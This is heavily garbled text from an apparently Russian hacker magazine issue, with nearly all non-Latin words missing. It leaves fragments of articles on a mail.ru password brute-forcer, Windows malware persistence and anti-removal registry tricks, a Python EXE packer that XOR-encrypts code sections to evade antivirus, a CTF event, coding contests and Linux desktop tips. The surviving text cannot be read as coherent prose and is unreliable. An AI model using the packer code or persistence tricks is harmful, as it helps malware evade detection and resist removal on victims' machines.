C:\randomfolder\
;
1800000 ;
16 WMA KHz.


bit.ly/jnzg7t.

: [mail.ru] Question
Brute
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: ZeaL

X 07 /150/ 2011

,
mail.ru.

: [mail.ru] Question
Checker
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: ZeaL


,

.
, ,
- 123,
qwerty ..
, ,
:
;
(

,
);
([mail.ru]
Question Brute 1.04).

: MicSpy++
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Nightmar

,

.

;
m.mail.ru (,
);
source-;
;
source;

mail.ru;
;
.


-. z

067

MALWARE
deeonis (deeonis@gmail.com)

,

-,
, .
, .
-,
.

, .

exe,
.
Windows. ,

068


, - .
:
,
. .
X 07 /150/ 2011

Process Explorer


, - , .
, - .
-
.
-, .

.
Windows, , , C:\Documents and Settings\admin\ \
\\. , admin,
All Users Default User.

, , API- CopyFile,
.

,
.
,
,
.
Windows
9- 98- 95- .
win.ini, [windows], , , run=_.
system.ini, [driver32]
_.
_=_ .
, .
Windows.
HKEY_CURRENT_USER\
Software\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Run\ RunOnce, , . ,
IE,
( ),
X 07 /150/ 2011

,
SENIOR MALWARE ANALYST,
HEURISTIC DETECTION GROUP, KASPERSKY LAB.
.
, -,
,
-
.
, .
, ,
Visual Basic Delphi. Windows
.
,
,
/, .
, ,
,
. , MBR

. , .

: HKEY_CURRENT_USER\Software\
Microsoft\Windows\CurrentVersion\Explorer\Browser
Helper Objects\. HKEY_LOCAL_MACHINE\Software\
Microsoft\Windows NT\CurrentVersion\Winlogon\
Userinit\, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\RunServices\, HKEY_LOCAL_
MACHINE\Software\Microsoft\Windows NT\CurrentVersion\
Winlogon\Notify\.
( exe, ,
dll).
, dll
explorer.exe, ,
Safe Mode.
HKEY_LOCAL_MACHINE\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\_\

069

MALWARE

IE BHO
_ ,
Debugger.
. , , ,
txt-, ,
,
.
.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\policies\Explorer\Run, .
, , - , ,
(
),
, , HiJackThis.

, ,
:
,
.
Windows.
, -, , .
, - ,
. , , ,

. ,
, , ,
, Visa MasterCard .
,
Fraud Antivirus, .
, . , - , ?
, -

070

.
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\System.
DisableRegistryTools.
1, regedit.exe .
DisableRegedit,
HKCU-
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\
System.
DisableTaskMgr HKCU\Software\Microsoft\Windows\
CurrentVersion\Policies\System. ,
. -
. HKEY_CURRENT_USER\
Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer RestrictRun
, RestrictRun,
exe-,
, .

DisallowRun,
.

. ,
DisallowRun RestrictRun.
- ! ,
, HKEY_CLASSES_ROOT\exefile\
shell\open\command.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options. , , .
,
. ,
,
,
.


. -

, , ,
.
.
X 07 /150/ 2011

-
. , ,
,
.
,
Windows. API- CreateWindowEx,
, ,
dwExStyle dwStyle, -
. ,
WS_EX_TOPMOST,

, , dwStyle

.
- ,
WM_CLOSE,
. , .
, WM_MOUSELEAVE ,
, , . ,
.
. , , , .
-. -
,
-
.
, Windows

-
.

. ,
,
.
, ,
, ,
, - . ,
shortcuts ,
.
. , WMI
(
X 07 /150/ 2011

). WMI , , , ,
.
, - , ,
. ,
,
.
.

hosts, %SystemRoot%\system32\
drivers\etc\.

. , yandex.ru ip- , ,
. hosts ,
, .
. ip ,
- Squid, , , - .
IE COM-,
.
DNS- . ,
, DNS-. netsh

, - ,
, WMI.
, route
table. route, API CreateIpForwardEntry.
ip- ,
. ( , ), -
, . hosts
, .

. ,
, , . , IE
BHO. ,
-. ,
-
, ,
,
, .


, . , ,
.
, , .
,
, ,
. z

071

MALWARE
presidentua (http://tutamc.com)

, ,
!
EXE- Python

Web .
, .

. EXE- ,
:).
1.

,
, , . , -

072

,
, ,
PE-, . -
.
X 07 /150/ 2011

HTTP://WWW
links

Olly. , Olly,
XOR
.
! , , ( VirusTotal).

!
. ,
, -
PE-, ,
,
SandBox,
, .
, ,
GitHub,
http://
github.com/presidentua/ExePacker.
,
. ++ VisualBasic,
,
. Python
, . ,
. !

2. PE-

PE- , ,

.
PE- , , ,
. Windowsa
, (,
DLL) ,
Entry Point.
, ,
.

3.

, . X 07 /150/ 2011

pefile

http://github.com/
presidentua/ExePacker

pefile http://code.
google.com/p/pefile/
TornadoWeb
http://www.tornadoweb.org/

PE-,

http://code.google.
com/p/pyew/

pefile
pefile ,
pe.__data__,
pe.__structures__. , . ,
, .
pe.write(filename=result.
exe)
.
- , , ,
.
:
+ .
pe.__structures__.
:).

:), , ,
Putty.exe. :
1.
2.
3.
. .
, ,
.

Putty. .
:
1.
2.
2.1. ,
4.2
2.2.
3.
4.
4.1. ,
2.1
4.2. , 4.1 2.1,

.

DVD
dvd




PE,
.

,

INFO

info
?
Python
Gray Hat
Python.

WARNING
warning
,
.
,
-
:).

073

MALWARE


, ()
, .
, :
, +10;
+30;
Zeus +30;
4 +20;
-10.
,
EXE,
.
, 100, ,
.

4.

- . pefile (
), Putty:
import pefile
pe = pefile.PE("putty.exe")

, print pe,
,
. .
. ,
. - 512
. 1024 :
pe.add_last_section(size=1024)

IDE

1.
, ,
.
.
, , . ,

Windows API. , API.
:
Windows- ;
API
- ;
,
;
, Windows.
PS: ,
. Windows .

. , ,
FASM . pack.tpl.asm
:

XOR 1:
pe.sections[0].xor_data(code=1)

, ? :). ,
++!
, , .
pe.sections[0].
PointerToRawData, ,
pe.sections[-1].PointerToRawData:
pe.data_copy(pe.sections[0].PointerToRawData,
pe.sections[-1].PointerToRawData, 512)

, -

074

use32
mov eax, {{ go }}
jmp eax

, , , ,
TornadoWeb,
,
HTML-. :
asm = Template(open("pack.tpl.asm", "r").read()).generate(
go=pe.OPTIONAL_HEADER.ImageBase +
pe.sections[-1].VirtualAddress+512,
)
with open("pack.asm", "w") as f:
f.write(asm)
X 07 /150/ 2011

PE-

os.system(r"c:\fasmw\FASM.EXE pack.asm")

go ,
, , 512
. FASM.
:
new_pack = open("pack.bin", "rb").read()
pe.data_replace(offset=pe.sections[0].PointerToRawData,
new_data=new_pack)

copy.tpl.asm.
, .
, 512 ,
. .

:
copy_from = pe.OPTIONAL_HEADER.ImageBase+pe.sections[-1].\
VirtualAddress
copy_to = pe.OPTIONAL_HEADER.ImageBase+pe.sections[0].\
VirtualAddress
oep = pe.OPTIONAL_HEADER.ImageBase+pe.OPTIONAL_HEADER.\
AddressOfEntryPoint
asm = Template(open("copy.tpl.asm", "r").read()).generate(
copy_from=copy_from,
copy_to=copy_to,
copy_len=512,
xor_len=pe.sections[0].Misc_VirtualSize,
key_encode=1,
original_oep=oep,
)

,
, :
new_copy = open("copy.bin", "rb").read()
pe.data_replace(offset=pe.sections[-1].\
PointerToRawData+512, new_data=new_copy)
X 07 /150/ 2011

1.

, SandBox . ,
,
,
,
. .

2.


. ,
.
.
,
, ,
, DLL
.

pe.sections[0].Characteristics |=
pefile.SECTION_CHARACTERISTICS["IMAGE_SCN_MEM_WRITE"]
pe.OPTIONAL_HEADER.AddressOfEntryPoint =
pe.sections[0].VirtualAddress
pe.write(filename="result.exe")

5.

, 50 .
50 !
, ?
, , . ,
,
. ,
. ! z

075


c0n Difesa (condifesa@gmail.com, http://defec.ru)

POSITIVE
HACK
DAYS
2011

19
Positive Hack Days 2011, ,
, Positive Technologies.
.
PHD2011
(@devteev)
PT .
, .
phdays.com,
.
-, ,

076

, , :
, , Defcon BlackHat, , ,
HITB.

, , : ,
X 07 /150/ 2011

Capture the flag


,
.
,
PHD2011, , .
, , ,
.
,
.
:
1. -;
2. -;
3. ;
4. .

, . ,
(
) .


CTF. ,
(
PT: bit.ly/fjS0in)
,
, , . , ,
just 4 fun 900 ,
iPhone: , : ,

( 0-day
Safari, X 07 /150/ 2011

) .
, ,
, , , .
.

Positive Technologies ,
,
.

, , PHD2011. (, ) -
. , , - , (
)
.
-
. , .
,
-,
.
, , , ,
:
,

.

DVD
dvd

CTF.

HTTP://WWW
links
,


PHD: phdays.ru .

:
devteev.blogspot.com .

Positive Technologies:
ptsecurity.ru.

077

PHD
. , PwC
,
: - -152 (
). ,
-,
IaaS (Infrastructure as a Service)
.
,
.
, jpeg-, ,
:
. ,
, . , ,
, ,
. , ,


,
,
.
,
The Anonymous
. ,

, , forensic-, , Group-IB, ,
.
, -

078

, ,
PT . . ? ,
-.
,
,
. -,
. ,
,
,
. . ,
. ,
, .

.
. ,
.
. , ,

.
. ,
,
, , .
, , ?. ,
, X 07 /150/ 2011

0day
-
CTF: PPP . ,
, :).


PHD2011, CTF
HackQuest, Positive Technologies .

Lock picking - , .
.
) .

[]: - .
? .
, , PT, .
, .
?
[]: . , ,

[]: , CTF?

. .

[]: -

[]: , CTF ?.

( PT . .),

, ,

[]: PPP -

. .

: ,

[M]: CTF

, -

[]: .

[]:

150 , 50

(Positive Hack Days). ?

[M]: PHD 2011

[]: PHD 2012

non-stop.

?
[]: ,
, , ,
,
CTF, ,
.

[]: :
, ?
[E]: , ,
. just 4 fun, (
X 07 /150/ 2011

Positive Hack Days : ,


,
, . ,
, ,
.
.
, . z

079


Mifrill (mifrill@real.xakep.ru)



, ?
!
, , -,

. ,
,
.
ACM ICPC
:

:
cm.baylor.edu/welcome.icpc

( ACM/ICPC
ICPC) .
, .
70- .
, , ,
. ACM ICPC,
, IT-,
.
(ACM). 1989 , . , Apple, AT&T Microsoft,
1997
IBM.

- 1996-1997,
. :
, . ,

080

, , .
, .
. ,

:). ,
, .
C, C++ Java
. ,
, -
,
..
( ),
.
:
- ICPC $12 000. ,
, $6 000. , , $3 000., ,
$1 500. , IBM
: - ICPC 12 , IBM,
, ,
. , .

Facebook Hacker Cup


:

:
facebook.com/hackercup

(Facebook) X 07 /150/ 2011

ICPC
.
Facebook Hacker Cup.
(2011 ), , .
20 2010
10 2011 . .
: .
, 7 2011 ( 0:00
UTC) 10 2011 ( 0:00 UTC).
, ,
72 . ,
, , 15-16 (3 3
). 1000 .
22 (
15:00 18:00 UTC). 300
( Hacker Cup) 25
. 25
: Facebook $5000
, $2000 , $1000
$100 4- 25-. , , ,
, , ,
Facebook -. , Facebook Hacker Cup , .

Top Coder
:

2528 2011

:
. Top Coder 2011 -, .

:
topcoder.com community.topcoder.com/tco11/
, TopCoder Inc.
( ),
Top Coder Open Top
Coder Collegiate Challenge ( ) . 2007 Top
X 07 /150/ 2011

Coder High School Tournament, .


Top Coder ,
. ,
,
.
TopCoder Inc
Test The Best Codeforces. Top
Coder Open ( Top Coder Invitational). ,
- . ,
, , ,
, 18 .
Top Coder 300 000 .
TopCoder c 2001
: Algorithm, Design, Development,
Marathon, Architecture, Assembly, Testing, Bug Races Studio.
Top Coder Open 2011 $150 000
100 - ( , ). Algorithm,
$15 000. ,
,
.
,
,
.

Google Code Jam


:

6 29 2011

:
. , 2011 Google

:
code.google.com/codejam
,
Google Code Jam. , -

081

ICPC

TopCoder Open

25 Facebook Hacker Cup 2011


Google, 2003 .
Google Code Jam ,
Google. -,
, IT-, ,
. :
,
. , , Google
Code Jam .
, Google-,

. , .
Google Facebook Hacker Cup:
$10 000, $2000,
$1000. 4 25
$100.

Google AI Challenge

Google Code Jam


2009

PlanetWars, Google AI
Challenge
C#, Java, Python, C++, Scala, PHP, Lisp, Haskell, OCaml,
CoffeeScript . , . 4600 112
. Google AI Challenge ,
, , , .
FAQ : .
. ,
:).

CodeCup
:

:
codecup.nl

:
ai-contest.com
Google ( )
. ,
. Galcon
. , -, : ,

. ,
.
. (
), . ,
, .

082

Google AI
Challenge. ,
Dvonn. , Google AI Challenge,
24/7 3 . ,
codecup.nl ( CodeCup
2011 , 2012 ).
, .
Linux,
-.
. 1.4 .
Pascal, C, C++, Java, Python, Haskell, Javascript
( ). ,
-, , ,
.
X 07 /150/ 2011

Facebook Hacker Cup

ICFPC
:

:
icfpcontest.org
. ICFP Contest , 1998 .
. ICFP (
) - ,
.
,

,

. , 72 (
). : lightning round ( , 24 ) main
round ( ).
(
Haskell, Objective Caml, C++, Cilk Java), . ICFPC
,
, .

AppUp Developer Challenge Intel


:

21

:
software.intel.com/ru-ru/articles/iadp-challenge-3
AppUp Developer Challenge ,
,
Intel Atom. 350
,
:
$60 .
, Alchemy
X 07 /150/ 2011

Facebook Hacker Cup


Top Coder Open


Classic. ,
Home Innovation Project AR Home.
$8 . , , : ,
. ,
, , ,
, .
, -
:
, MeeGo,
/
. ,
, :
, 700- ,
50
:). :
TED, ,
,
Comic-Con . z

083

UNIXOID
grinder (grinder@tux.in.ua)

KDE4
GNOME3
KDE GNOME , ,
. ,
, : , , . .

.
, KDE
SC 4.6.2, Ubuntu 10.10
4.5.1.
openSUSE 11.4, Gentoo Linux, FreeBSD, OpenBSD ..
, , .
, .

084

,
. : ,
,
, . ,
. , KDE GNOME.
Linux Mint 10 GNOME.
.
, .
,
X 07 /150/ 2011

KDE Ubuntu
Ubuntu KDE, ,
kubuntu-ppa/backports:
$ sudo add-apt-repository ppa:kubuntu-ppa/
backports
$ sudo apt-get update
$ sudo apt-get install kubuntu-desktop

. , , /home.

sudo. admin ( Linux Mint).
.
~/.build-config,
(clck.ru/BZTg) ~/.bashrc. ,
. , 64- :
export LIB_SUFFIX=64

kdesdk, alias
make=makeobj. ,
PyKDE4 DBUS.
function cmakekde,
cmake. ,
:
cmake $KDE_BUILD
\ -DCMAKE_INSTALL_PREFIX=$KDEDIR
\ -DCMAKE_BUILD_TYPE=debugfull
\ -DKDE4_BUILD_TESTS=TRUE
nice make -j2
make install

'-j' (X+1), CPU.


KDE ,
$KDEDIR.
kdesrc-build (kdesrc-bld.kde.org) build-tool.
KDE . ,
,
~/.kdesrc-buildrc. , .
$ cp ~/kdesrc-build-1.13/kdesrc-buildrc-sample \
~/.kdesrc-buildrc

.
, . ,
:
kde-languages ru

:
module <module-name>
end module

:
$ sudo ./kdesrc-buildrc
X 07 /150/ 2011

, , , .
, ,
, '--no-svn'.
'--pretend', . , , '--refresh-build'
,
. kdesrc-build Perl libwww. , .
, qt-copy, kdesupport, kdelibs, kdepimlibs, kdebase
7 , 20
.
.

KDE,
.
~/kde. ~/kde/src , ~/kde/
build . , cs cb,
.
kubuntu-ppa/backports, :
$ sudo apt-get install apt-build


.
$ sudo apt-build install kubuntu-desktop

, /etc/
apt/apt-build.conf. , ,
,
. apt
, , :
$ sudo apt-get source kubuntu-desktop
$ sudo apt-get build-dep kubuntu-desktop

, ,
. , buildessential, cmake, doxygen, . ,
, - . ,
libxine-dev, KDE
. Git (quickgit.kde.
org) (ftp.kde.org/pub/kde). SVN,
. :

085

UNIXOID


apt-build
$ nano ~/.gitconfig
[url "git://anongit.kde.org/"]
insteadOf = kde:
[url "git@git.kde.org:"]
pushInsteadOf = kde:

. , , :
$ git clone kde:kdelibs
$ git clone kde:kde-workspace
$ git clone kde:kdepimlibs

, kdemultimedia,
kdeartwork, extragear .
Qt. .
KDE', , KDE,
..
$ git clone kde:qt-kde

Gitorious, Qt :
// Qt
$ git clone git://gitorious.org/qt/qt.git
//
$ git clone \
git://gitorious.org/+kde-developers/qt/kde-qt.git

~/.bashrc ~/.build-config,
, :
$ sudo cmakekde

,
:

cmake

, , , . , , , ,
. , add_subdirectory() add_
optional_subdirectory() CMakesLists.txt
.
, ,
. ,
,
, .
strigi nepomuk,
kdepim-. , KWin OpenGL .
Akonadi 20%
. , KDE3, .
raster trace qt-gui,
, , 30 .
: USE- (gentoo.org/dyn/use-index.xml) ,
. ,
Gentoo XZ-, KDE4
200 (1,8 2 ). ,
. , kwin
openbox- .
Antico, Qt4/X11
+ ( KDE+KWin). kdelibs,
. , KDE. 0.2
. Antico Git:
$ git clone git://github.com/antico/antico.git

cd $KDE_BUILD
for dir in
kdelibs
kdepimlibs
... ..
;
do cd $KDE_BUILD/$dir; cmakekde 2> /dev/stdout; done

KDE cmake, ./configure,


, .
cmake
CMakesLists.txt *.cmake.
.

086

GDM KDM, /usr/


sbin/kdm /etc/X11/default-display-manager.
~/.xsession ~/.xinitrc startkde . , Debian,
/etc/alternatives.
x-window-manager ,
x-session-manager . /usr/share/xsessions/
kde4.desktop :
$ sudo nano /usr/share/xsessions/kde4.desktop
Exec=$HOME/kde/bin/startkde
X 07 /150/ 2011

~/.jhbuildrc. , .
$ cp examples/sample.jhbuildrc ~/.jhbuildrc

, ,
, , .
live.
gnome.org/Jhbuild/Modulesets. ,
, ,
. :

JHBuild

TryExec=$HOME/kde/bin/startkde
Name=KDE4

GNOME3

, , , ,
. GNOME
3.2.
,
Live-: openSUSE Fedora (gnome3.org/tryit.
html).
openSUSE 11.4, Ubuntu 11.04 Natty Narwhal Fedora 15.
, ,
Linux Mint, PPA- GNOME 3 Stack.
, Gtk+ 3.
$ sudo add-apt-repository ppa:ubuntu-desktop/gnome3-builds
$ sudo apt-get update
$ sudo apt-get install gnome3-session

$ nano ~/.jhbuildrc
repos['git.gnome.org'] = 'ssh://user@git.gnome.org/git/'
moduleset = 'gnome-suites-core-3.0'
modules = [ 'meta-gnome-desktop' ]
checkoutroot = os.path.expanduser('~/checkout/gnome')
prefix = '/opt/gnome'
# CFLAGS
# os.environ['CFLAGS'] = '-Wall -g -O0'
#
'--disable-static --disable-gtk-doc'
#autogenargs=''
makeargs = '-j2'

:
$ jhbuild sanitycheck

, . :
jhbuild ,
, ,
, jhbuild sanitycheck.
live.gnome.org/JhbuildDependencies ( : m4, Perl, Python GCC).
, ,
.

bootstrap:

$ gnome-shell --replace

, GNOME3.
, , Linux Mint .
APT .
Git- (git.gnome.org) FTP- (ftp.
gnome.org/pub/GNOME).
GNOME
Python JHBuild (developer.gnome.org/jhbuild).
Git ( gnome-common):
$
$
$
$

git clone git://git.gnome.org/jhbuild


cd jhbuild
make -f Makefile.plain
make -f Makefile.plain install

JHBuild , PATH ~/.local/bin.


$ echo PATH=$PATH:~/.local/bin >> ~/.bashrc

X 07 /150/ 2011

$ jhbuild bootstrap

sanitycheck , ,
:
$ jhbuild build

JHBuild ,
~/.jhbuildrc . ,
, ,
(, , ..).
JHBuild
:
$ jhbuild build gtk+

, KDE4 GNOME3
. ( ) , . ,
, . z

087

UNIXOID
(execbit.ru)

Must have-

,
,
.

?
, :
1.
, . , - , ,
.
2. , ,
.
3. ,
, , .
, ,
.
4. : ( ) ,

088

, ,
. , -
.
5. , - ,
- .
,
, Linux, -,
. . ,
.

,
. ,
.

X 07 /150/ 2011

, encfs
.
, . , , .
,
rsync, sp git,
, ,
(
).
, .
Dropbox,
,
, .
, .
Dropbox ,
, ,
(
delta-, ).
Dropbox . -,
,

( Dropbox ,

, ),
-,
(2 ), .
,
Unison,
Dropbox,
(GTK CLI), ,
,
.

SSH- ()
IP-,
. ,
. Unison :

( default),
.
,
(SSH), .
,
.
Go.
Unison
, cron:
$ echo "*/10 * * * * /usr/bin/unison -auto -batch"
| crontab -

, . ,
, , .
,
. ,
, . :

gsynaptics

INFO

info
ArchLinux

webfs
:
$ yaourt -S quickserve
$ quickserve \
///


:
$ cd ///
$ python -m \
SimpleHTTPServer


:
$ synclient
TouchpadOff=1

$ sudo apt-get install unison


(). :
$ unison-gtk2
X 07 /150/ 2011

089

UNIXOID

Prey?

Windows

Prey :
, , (
) ,
, . ,

. Ethernet
Linux
DHCP ( ,
). WiFi :
,
,
.
, c
.


.

,
( , ).
,
Windows.
Linux, , ,
Prey .
dual-boot, Windows
, Prey (,
Prey ,
Android).

, ,
, ,
.
, ,
,
,
.
: ( )
(
, )
. ? :
:
1) encfs, (,
TrueCrypt dm-crypt, );
2) Prey, , web- ..
encfs. ,
:
$ sudo apt-get install encfs

, . ~/.crypto:
$ mkdir ~/.crypto

/
. ~/decrypto:
$ mkdir ~/decrypto

encfs:
$ encfs ~/.crypto ~/decrypto

p. . , decrypto,
, ~/crypto.
.
:
$ fusermount -u ~/decrypto
$ ls -l ~/.crypto ~/decrypto

decrypto ,
. , , web-:

090

$ mv ~/.config/chromium ~/decrypto
$ ln -s ~/decrypto/chromium ~/.config/chromium

, , encfs , .
, encfs
pam_mount ,
, .
, ,
. :
$ vi ~/bin/encfsmount.sh
#!/bin/sh
ENC=/home/vasya/.crypto
DEC=/home/vasya/decrypto
if [ 'grep encfs /proc/mounts | grep $MNT)' != "" ];
then
zenity --title="encfs" --question --text=" encfs?"
if [ $? == 0 ]
then
fusermount -u $DEC &
fi
else
zenity --entry --hide-text --title="encfs" \
--text="?" | encfs -S $ENC $DEC
fi

(chmod +x ~/bin/encfs_mount.sh)
.
~/.config/autostart,
. Prey.
, , , e-mail. ,
, WiFi
GPS-, , , traceroute, ,
, web-. ,
,
: , , , , ,
, ,
. ,
(preyproject.com) Linux-.
0.5.3.
/usr/share:
X 07 /150/ 2011

Prey
$ cd /usr/share
$ sudo unzip ~/prey-0.5.3-linux.zip

, web-,
Prey ,
control.preyproject.com, , Add
new device, ,
Information to gather ( ). Device information,
,
Prey, .
/usr/share/prey/config :
device_key=''

Account , API Key, :


api_key=''

Prey , ,
:
$ sh prey.sh --check

, . ,
, Prey ,

(, , ).
Prey cron, 10
:

keytouch
$ sudo su
$ echo "*/10 * * * * /usr/share/prey/prey.sh > /var/log/prey.
log" | crontab -

,
Missing
YES. Prey .
,
New report!.
Prey
( ,
), , ,
Prey , ,
X 07 /150/ 2011

091

UNIXOID

web- Linux
:
$ mplayer tv://
s:
$ mplayer tv:// -vf screenshot
:
$ mencoder tv:// -ovc lavc -o webcam.avi

slim ,
/etc/slim.conf:

, Prey,
10
e-mail. , ,
web-, /
Prey
(, laptop_missed.
html site.com, Prey, ,
e-mail).
,
:
$ sudo vi /usr/share/prey/config
#
check_url='http://site.com/laptop_missed.html'
#
missing_status_code='200'
# e-mail
post_method='email'
#
mail_to='vasya@gmail.com'
smtp_server='smtp.gmail.com:587'
smtp_username='vasya@gmail.com'
smtp_password=''

: ,
-
( Ethernet- WiFi).
, gdm (Gnome)
kdm (KDE). gdm /etc/gdm/custom.conf
:
$ sudo vi /etc/gdm/custom.conf
[daemon]
TimedLoginEnable=true
AutomaticLoginEnable=false
TimedLogin=vasya
AutomaticLogin=vasya
TimedLoginDelay=5
DefaultSession=gnome

kdm /usr/local/share/config/kdm/kdmrc
:
$ sudo vi /usr/local/share/config/kdm/kdmrc
NoPassUsers=vasya
DefaultUser=vasya
AutoLoginUser=vasya

092

$ sudo vi /etc/slim.conf
default_user vasya
auto_login yes


, .
, .
Linux SMB-
(Samba), Windows-.
, , ,
- FreeBSD,
.
FTP HTTP. ,
FTP,
ftp-:
$ sudo apt-get install vsftpd

/home/ftp (
pub, ).
web-:
$ sudo apt-get install webfs
$ webfsd -p 8080 -r ///

http://IP-:8080.

, - .

.
, , .
xmodmap, .
keytouch
(keytouch.sf.net),
.
,
:
$ sudo apt-get install keytouch


/. , ,
( ).
X 07 /150/ 2011

Dropbox, Unison
, . :
synaptics,
Linux
gsynaptics ( ,
synclient,
X.org).
$ sudo apt-get install gsynaptics

.
.
,
.

,
.
,
powertop, , .
:
$ sudo apt-get install powertop
$ sudo powertop

, top- .
X 07 /150/ 2011

,
.
, .
, , ( ,
).
(WiFi-, )
.
jupiter,
,
.
, :
$ sudo apt-get install jupiter

. ,
,
:
.
( ) WiFi.
.
/ .

,
, . ,
. z

093

UNIXOID
Adept (adeptg@gmail.com)

LibreOffice
Mageia

Linux Mint

OpenSource. ,
, , , - .
.

LibreOffice . , ,
OpenOffice Sun. : , ,
, Sun
upstream.
, .
( , , Novell)
OOo, . Go-OO
VBA-,
Microsoft OOXML, .
(SUSE, Debian, Ubuntu )

094

Go-OO. ,
Go-OO ,
,
OpenOffice.
, OpenOffice Sun .
, Oracle Sun.
, . Oracle
,
,
Document Foundation. -
(
). Document Foundation
, FSF,
OASIS, GNOME Foundation, Google, Novell, Red Hat, Canonical
( 2011 39 goo.gl/
X 07 /150/ 2011

Mageia

LibreOffice Writer OpenOffice Writer


LibreOffice
UqGHN). Oracle
,
OpenOffice.org.
Oracle ,
Document Foundation OpenOffice.org.
, LibreOffice.
.
Document Foundation
(28 2010 ) -
LibreOffice 3.3.0 ( OOo), , ,
Go-OO. : wiki, IRC, ( 13
, ). - 80000 . 45 ( 25 ).
, IRC- 100 ,
14000.
,
. Twitter .

, 20 fulltime (Red Hat,
Novell, Canonical).
5 2011
1,3 .
3.3 Document Foundation
,
. (50000 )
8 !
LibreOffice 3.3 OpenOffice.org
3.3 ( ,
,
,
Calc 65000 1 ), :
SVG;

X 07 /150/ 2011

(Writer);

(, <F5>),
,
;
MS Works Lotus
Word Pro, WordPerfect;
, (, ),
.
LibreOffice () ;

: Calc A1, Excel A1 Excel R1C1;
ODS, Excel DBF; Excel,
pptx.
LibreOffice 3.3
OpenOffice : Ubuntu 11.04,
Fedora 15, openSUSE 11.4, Mandriva 2011. LibreOffice
Google Summer of Code 2011
( ,
, Visio-).

HTTP://WWW
links
goo.gl/AWH2p
Document
Foundation
goo.gl/DT6z8
changelog
LibreOffice 3.3
goo.gl/9RhuB

LibreOffice Google
Summer of Code 2011
goo.gl/8Gkft
Icinga
Nagios

OpenSource , -
. , ,
.
, .
mplayer (, ,
10 ). mplayerxp,
( , mplayer

). mplayerww Windows-only, ,
PMP (PlayStation Portable),
DSP- winamp
.
mplayer2.
,
:
. mplayer
.
mplayer2 ;

095

UNIXOID

, , :

.
.
Gosa FusionDirectory. Gosa
- LDAP
, , ,
. : Gosa ,
, GONICUS GmbH,
(, )
.
Redmine
.
ChiliProject, 2011 .
( ,
upstream) ,
ChiliProject community. ,
.
Hudson
Sun, Oracle.
2010 (java.net)

( ).
, github,
Jenkins ( Oracle
Hudson). , Oracle
Hudson ,
Eclipse Foundation.
Enterprise- OpenSource . , Nagios,
Icinga.
Nagios Enterprises.
Icinga
, :
- C
, PHP Ajax;
.
( LDAP);
IPv6,
IPv6/IPv4-;
API (XML, JSON, SOAP);
-.
Icinga
Nagios.
.
FPS Nexuiz. (Lee Vermeulen), ,

Illfonic. (
GPL)
.
Xonotic.
,
.

Firefox 2 .
Mozilla Application Suite ;
X.Org XFree86, , , -
;
Ubuntu Debian, 1
;
OpenBSD BSD. ,
NetBSD, 1995 -
;
Joomla CMS,
- CMS Mambo.

Matroska;
;
Nvidia VDPAU,
GPU;
FFmpeg,
FFmpeg API;
mencoder ( ,
, ).
- , ,

mplayer2;
GUI-.
- 2.0,
mplayer. ,
,
,

.
GUI mplayer .
UMPlayer, SMPlayer. 1.0, ,
,
. ,
Windows Linux, Mac OS X. :
CSS.
;
, Youtube;
SHOUTcast-;
opensubtitles.org.
.
, . .
, FFmpeg
. ,
git,
,
. ,
, ,
, , , . , .
,
. Libav.

.

096

,
/.
Mandriva 30
. ,
X 07 /150/ 2011

ChiliProject

UMPlayer

Ubuntu KDE 3.5


Linux Mint
Mageia, . Mandriva 2010.1:
, OpenOffice
LibreOffice.
, ,
:
( 10000 ),
(, wiki), , , , IRC-
. , . . , Mandriva Mandriva 2011,
. , -
.
Android
IcedRobot,
. Dalvik Virtual Machine
( Java, Android) OpenJDK
( Java, GPL),
.
Dalvik ,
Android .
, Dalvik
OpenJDK. :
Android- ,
OpenJDK;
OpenJDK ( ,
).
.
- Debian,
Ubuntu,
.
Ubuntu
Linux Mint,
X 07 /150/ 2011

Ubuntu ( , distrowatch.com
). ,
11 ( Katya),
Ubuntu 11.04 Unity ( Gnome 2.32), (
flashplayer, unrar) ( DVD-),
:
mintMenu GNOME;
mintInstall ,
Ubuntu;
mintUpdate ;
mintBackup .
, DE , . ,
.
.
KDE 3.5. KDE4 KDE
. 3.5, Trinity Desktop Environment.
, , : , Qt4 HAL udev. (www.trinitydesktop.org)
Debian/Ubuntu, RPM-
RedHat/Fedora OpenSUSE .

To fork or not to fork

. ,
, , .
, , X.Org, 2004
XFree86 - .
. GCC. 1997
EGCS, . ,
GCC EGCS. z

097

CODING
(antonov.igor.khv@gmail.com, http://vr-online.ru)



Dropbox, VK, Flikr Facebook

, , Facebook -
. ? ?
,
. ? ? .
?

.
. ,
. ,
?, . ,
, . ,
..
. ,
. . ,
,
. -

098

( )

. . .
,
, . .
www.vr-online.ru , Twitter .

. , . ?! , .
, .
.
.
X 07 /150/ 2011

1. DropBox

DROPBOX
// DropBox.DropBoxCredentials
// ,
// DropBox
DropBox.DropBoxCredentials myCredentials = new AppLimit.
CloudComputing.SharpBox.DropBox.DropBoxCredentials();
// ,
myCredentials.ConsumerKey = "kxsdqll7p11dtcy";
// ,
myCredentials.ConsumerSecret = "dhw5dvlrmxw62oe";
//
// ( )
myCredentials.UserName = "anton@gmail.com";
myCredentials.Password = "13241414";
// DP
DropBox.DropBoxConfiguration myConfiguration =
DropBox.DropBoxConfiguration.GetStandardConfiguration();

2. Facebook C# SDK CodePlex

AUTH
using TweetSharp;
TwitterService tws =
new TwitterService("_", "_");
//
OAuthRequestToken reqToken =
tws.GetRequestToken();
// url oAuth
Uri uri = tws.GetAuthorizationUri(reqToken);
Process.Start(uri.ToString());
//
string verifier = "123456"; //
OAuthAccessToken access =
service.GetAccessToken(requestToken, verifier);
//
service.AuthenticateWith(access.Token, access.
TokenSecret);

CloudStorage myStorage = new CloudStorage();


// ,
//
if (!myStorage.Open(myConfiguration, myCredentials))
{
MsgBox(" !");
return;
}
// ok, /
myStorage.UploadFile("article_for_x.txt",
"/MyPublicDirectory");
